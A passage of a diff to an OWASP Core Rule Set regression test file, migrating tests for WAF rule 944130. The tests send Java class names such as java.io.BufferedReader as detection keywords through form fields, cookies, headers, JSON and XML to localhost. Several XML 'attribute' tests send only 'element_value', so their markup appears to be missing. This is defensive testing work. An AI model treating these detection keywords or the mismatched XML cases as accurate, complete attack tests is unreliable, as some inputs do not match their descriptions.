test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 40 desc: "XML element value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 41 desc: "Nested XML element value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 42 desc: "Content-Type text/plain includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 43 desc: 
"Content-Type application/json arg value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 44 desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.BufferedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.BufferedReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 45 desc: "Argument test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 46 desc: "Argument name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS 
test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 47 desc: "Cookie test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 48 desc: "Cookie name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: 
java.io.ByteArrayInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 49 desc: "Request header test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 50 desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 51 desc: "XML element value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 52 desc: "Nested XML element value includes keyword 
java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 53 desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"test=java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 54 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 55 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ByteArrayInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 56 desc: "Argument test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 57 desc: "Argument name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"java.io.ByteArrayOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 58 desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 59 desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 60 desc: "Request header test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" 
+ data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 61 desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 62 desc: "XML element value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 63 desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 64 desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 65 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 66 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
